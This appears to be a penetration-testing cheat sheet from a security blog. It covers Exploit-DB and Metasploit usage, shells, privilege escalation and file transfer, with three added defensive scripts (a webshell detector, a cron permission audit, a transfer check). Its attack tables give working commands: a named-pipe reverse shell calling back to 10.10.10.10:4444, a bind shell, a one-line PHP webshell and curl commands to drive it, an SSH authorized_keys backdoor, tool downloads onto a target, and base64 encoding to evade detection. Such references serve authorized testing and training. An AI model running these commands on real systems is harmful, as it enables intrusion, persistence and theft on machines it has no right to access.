Exploitation Cheat Sheet

Introduction

Welcome to the blog's Exploitation Cheat Sheet! I will be actively updating it through commits as needed.


Exploits

| Public Exploits | Description |
| --- | --- |
| `searchsploit openssh 7.2` | Search Exploit-DB for public exploits for a given piece of software and version (here OpenSSH 7.2). Try to search online too |
| `searchsploit -m linux/remote/45233.py` | Mirror (copy) the PoC or exploit script into the current directory |
| `msfconsole` | MSF: Start the Metasploit Framework |
| `search exploit eternalblue` | MSF: Search for public exploits in MSF |
| `use [exploit]` | MSF: Start using an MSF module |
| `show options` | MSF: Show the required options for an MSF module |
| `set RHOSTS 10.10.10.10`, `set LHOST eth0` | MSF: Set a value for an MSF module option (the listener option is `LHOST`, which accepts an interface name as well as an IP) |
| `check` | MSF: Test whether the target is vulnerable without running the exploit (not supported by every module) |
| `exploit` | MSF: Run the exploit against the target |
| https://swisskyrepo.github.io/PayloadsAllTheThings | PayloadsAllTheThings |
| https://book.hacktricks.wiki/en/index.html | HackTricks |


Shells

| Shells | Description |
| --- | --- |
| `nc -lvnp 4444` | Start a nc listener on a local port (verbose mode, DNS resolution disabled) |
| `nc 10.10.10.10 4444` | Connect to a bind shell listening on the remote server |
| https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/ | Reverse shells cheat sheet |
| https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/ | Bind shells cheat sheet |
| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f \| /bin/sh -i 2>&1 \| nc 10.10.10.10 4444 >/tmp/f` | Named-pipe reverse shell: run on the target, connects back to the listener on 10.10.10.10:4444 |
| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f \| /bin/bash -i 2>&1 \| nc -lvp 4444 >/tmp/f` | Named-pipe bind shell: run on the target, listens on port 4444 |
| Forward Shells | Forward shells (alternative when neither a reverse nor a bind connection is possible) |
| `script /dev/null -c bash` | TTY upgrading, step 1: spawn bash under a pseudo-terminal |
| `ctrl+z` | Step 2: background the shell on the attacker's terminal |
| `stty raw -echo; fg` | Step 3: switch the local terminal to raw mode and bring the shell back to the foreground |
| `reset xterm` | Step 4: reset the terminal |
| `export TERM=xterm` | Step 5: set the terminal type |
| `export SHELL=bash` | Step 6: set the shell variable |
| `stty rows 45 columns 184` | Step 7: set the terminal size (use the values `stty size` reports in your local terminal) |
| `python -c 'import pty; pty.spawn("/bin/bash")'` | TTY upgrading (python) |
| `echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php` | Create a PHP webshell file |
| `curl http://10.10.10.10/shell.php?cmd=id` | Execute a command through an uploaded webshell |
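The one-line webshell above is also the pattern a defender looks for in a web root. The following is an added example, not part of the original cheat sheet: a small scanner that flags PHP files passing request parameters (or a `base64_decode` result) into command-execution or eval functions. The function names, the regex and the sample web root are constructed for this example; the sample contains the cheat sheet's own one-liner, an `eval(base64_decode(...))` variant hidden in an uploads directory, and one benign file.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: find PHP files under a
# web root that hand request parameters to command-execution functions, the
# pattern the one-line webshell above uses. The function names, the regex and
# the sample files are constructed for this example.

# Extended regex: an execution/eval function whose argument contains a request
# superglobal or a base64_decode call.
WEBSHELL_RE='(system|shell_exec|exec|passthru|popen|proc_open|eval|assert)[[:space:]]*\((.*\$_(GET|POST|REQUEST|COOKIE)|.*base64_decode)'

# find_webshells DIR: print every .php file under DIR matching WEBSHELL_RE, sorted
find_webshells() {
    find "$1" -type f -name '*.php' 2>/dev/null | sort | while read -r f; do
        if grep -Eq "$WEBSHELL_RE" "$f"; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# make_sample_webroot: build a constructed web root in a temp dir and print its
# path. shell.php is the exact one-liner from the cheat sheet, uploads/img.php
# hides an eval(base64_decode(...)) variant, index.php is benign.
make_sample_webroot() {
    d=$(mktemp -d)
    mkdir -p "$d/uploads"
    printf '%s\n' "<?php system(\$_GET['cmd']);?>" > "$d/shell.php"
    printf '%s\n' '<?php eval(base64_decode($_POST["p"])); ?>' > "$d/uploads/img.php"
    printf '%s\n' '<?php echo "hello"; ?>' > "$d/index.php"
    printf '%s\n' "$d"
}

# Demo on the constructed root: prints shell.php and uploads/img.php, not index.php
demo_root=$(make_sample_webroot)
find_webshells "$demo_root"
rm -rf "$demo_root"
```

Run it against a real web root with `find_webshells /var/www/html`; matches are candidates for manual review, since the regex is deliberately broad (any `exec`-family call fed from `$_GET`/`$_POST` or from a decoded blob) and legitimate code can trip it.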


Post-Exploitation

PrivEsc

| Post-Exploitation | Description |
| --- | --- |
| `./linpeas.sh` | Run the linpeas script to enumerate the remote server |
| `./lse.sh` | Run the lse script to enumerate the remote server |
| `sudo -l` | List the sudo privileges available to the current user |
| `sudo -u user /bin/echo pwned` | Run a command as another user with sudo |
| `sudo su -` | Switch to the root user (if we have sudo access to su) |
| `sudo su user -` | Switch to a user (if we have sudo access to su) |
| `find / -perm -4000 -ls 2>/dev/null` | Find SUID binaries |
| `ssh-keygen -f key` | Create a new SSH key pair (`key` and `key.pub`) |
| `echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys` | Once key.pub is on the system, append the generated public key to the target user's authorized_keys |
| `ssh user@10.10.10.10 -i key` | SSH to the server with the generated private key |
| `chmod 600 id_rsa; ssh user@10.10.10.10 -i id_rsa` | If you have read access to the user's SSH private key, copy it to a file, chmod it and SSH to the server |
| `crontab -l` | List the current user's cron jobs |
| `systemctl list-timers` | List systemd timers and the time left until each one runs |
| `/etc/crontab`, `/etc/cron.d`, `/var/spool/cron/crontabs/root` | Write access to any of these files allows us to add new cron jobs. Also, if we can write to a directory or script called by a cron job, we can write a reverse shell there and it will be executed |
| `./pspy` | Monitor running processes to spot cron jobs as they execute |
| `getcap -r / 2>/dev/null` | Search the system for binaries with file capabilities |
| https://gtfobins.org/ | GTFOBins |
| https://lolbas-project.github.io/ | LOLBAS |
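The cron rows above describe a misconfiguration (a job whose script or directory can be written by someone other than root) that is just as easy to check for from the administrator's side. The following is an added example, not part of the original cheat sheet: an audit of a system-style crontab (`min hour dom mon dow user command`) that reports every job whose program, or the directory holding it, is world-writable. The function names and the sample layout are constructed for this example; the check uses the mode bits (`find -perm -002`) rather than `[ -w ]` so the result does not depend on which user runs the audit.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: audit a system-style
# crontab (min hour dom mon dow user command) for jobs whose program, or the
# directory holding it, is world-writable, i.e. the misconfiguration the rows
# above describe, checked from the administrator's side. Function names and the
# sample layout are constructed for this example.

# world_writable PATH: succeed if PATH has the other-write bit (o+w) set.
# A mode-bit test rather than [ -w ], so the answer does not depend on who runs it.
world_writable() {
    [ -n "$(find "$1" -maxdepth 0 -perm -002 2>/dev/null)" ]
}

# audit_cron_file CRONTAB: one report line per finding, in crontab order
audit_cron_file() {
    if world_writable "$1"; then
        printf 'WORLD-WRITABLE-CRONTAB %s\n' "$1"
    fi
    # skip comments, blank lines and VAR=value settings
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" | while read -r min hour dom mon dow user cmd; do
        prog=${cmd%% *}                      # first word of the command field
        case $prog in
            /*) ;;                           # only absolute paths can be checked here
            *) continue ;;
        esac
        if world_writable "$(dirname "$prog")"; then
            printf 'WORLD-WRITABLE-DIR %s (runs %s)\n' "$(dirname "$prog")" "$prog"
        fi
        if world_writable "$prog"; then
            printf 'WORLD-WRITABLE-FILE %s\n' "$prog"
        fi
    done
    return 0
}

# make_sample_cron_layout: constructed crontab plus three jobs: one script in a
# world-writable directory, one script that is itself world-writable, and one
# that is fine. Prints the temp dir.
make_sample_cron_layout() {
    d=$(mktemp -d)
    mkdir -p "$d/scripts" "$d/bin"
    printf '#!/bin/sh\necho backup\n' > "$d/scripts/backup.sh"
    printf '#!/bin/sh\necho rotate\n' > "$d/bin/rotate"
    printf '#!/bin/sh\necho ok\n' > "$d/bin/safe"
    chmod 777 "$d/scripts"; chmod 755 "$d/scripts/backup.sh"
    chmod 755 "$d/bin"; chmod 777 "$d/bin/rotate"; chmod 755 "$d/bin/safe"
    {
        printf 'SHELL=/bin/sh\n'
        printf '# m h dom mon dow user command\n'
        printf '*/5 * * * * root %s/scripts/backup.sh\n' "$d"
        printf '0 3 * * * root %s/bin/rotate --weekly\n' "$d"
        printf '15 4 * * * root %s/bin/safe\n' "$d"
    } > "$d/etc_crontab"
    chmod 644 "$d/etc_crontab"
    printf '%s\n' "$d"
}

# Demo on the constructed layout: prints the DIR finding for backup.sh and the
# FILE finding for rotate, nothing for safe
demo=$(make_sample_cron_layout)
audit_cron_file "$demo/etc_crontab"
rm -rf "$demo"
```

On a real host run `audit_cron_file /etc/crontab` and loop it over `/etc/cron.d/*`; per-user crontabs under `/var/spool/cron/crontabs` have no user column, so their command field starts one word earlier and would need the `read` adjusted.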
Transferring Files

| Post-Exploitation | Description |
| --- | --- |
| `python3 -m http.server 4444` | Start a local web server |
| `wget http://10.10.10.10:4444/linenum.sh` | Download a file onto the remote server from our local machine |
| `curl http://10.10.10.10:4444/linenum.sh -o linenum.sh` | Download a file onto the remote server from our local machine (curl) |
| `scp linenum.sh user@10.10.10.10:/tmp/linenum.sh` | Transfer a file to the remote server with scp (requires SSH access with a password or key) |
| `base64 linenum.sh -w 0` | Convert a file to single-line base64, useful to avoid detection |
| `echo f0VMR...SNIP...InmDwU \| base64 -d > linenum.sh` | Convert a base64 blob back to the original file |
| `md5sum shell` | Compare the file's md5sum on both ends to ensure it was transferred and decoded correctly |
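The three base64 rows above are one procedure, and the md5sum step is what catches the usual failure: a long blob truncated while being pasted decodes without error and silently produces a broken file. The following is an added example, not part of the original cheat sheet, that runs the encode, decode and verify steps as a round trip and shows a truncated blob failing the check. The function names and the sample payload are constructed for this example; `base64 -w 0` and `md5sum` are the GNU coreutils tools the rows use.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: the base64 transfer
# from the rows above as a round trip with an md5sum check at the end, so a
# blob truncated while being pasted is caught instead of silently producing a
# broken file. Function names and the sample payload are constructed for this
# example; base64 -w 0 and md5sum are the GNU coreutils tools the rows use.

# b64_pack FILE: single-line base64 of FILE, as the cheat sheet does
b64_pack() {
    base64 -w 0 "$1"
}

# b64_unpack BLOB OUTFILE: decode a base64 string into OUTFILE
b64_unpack() {
    printf '%s' "$1" | base64 -d > "$2"
}

# file_md5 FILE: print just the hex digest
file_md5() {
    md5sum < "$1" | cut -d ' ' -f 1
}

# verify_transfer ORIGINAL COPY: succeed only if both digests match
verify_transfer() {
    [ "$(file_md5 "$1")" = "$(file_md5 "$2")" ]
}

# make_sample_payload: constructed input file (20 lines of text), prints its path
make_sample_payload() {
    f=$(mktemp)
    i=1
    while [ "$i" -le 20 ]; do
        printf 'line %02d: constructed payload for the transfer demo\n' "$i"
        i=$((i + 1))
    done > "$f"
    printf '%s\n' "$f"
}

# Demo: the full blob verifies; a blob cut short (at a 4-character boundary, so
# base64 -d does not complain) decodes cleanly but fails the digest check
src=$(make_sample_payload)
blob=$(b64_pack "$src")
good=$(mktemp); b64_unpack "$blob" "$good"
verify_transfer "$src" "$good" && echo "full blob: md5 matches"
bad=$(mktemp); b64_unpack "$(printf '%s' "$blob" | cut -c 1-400)" "$bad"
verify_transfer "$src" "$bad" || echo "truncated blob: md5 mismatch"
rm -f "$src" "$good" "$bad"
```

In practice `file_md5` is run on the local copy before pasting and on the decoded file on the remote side; if the digests differ, re-send the blob rather than trusting the file.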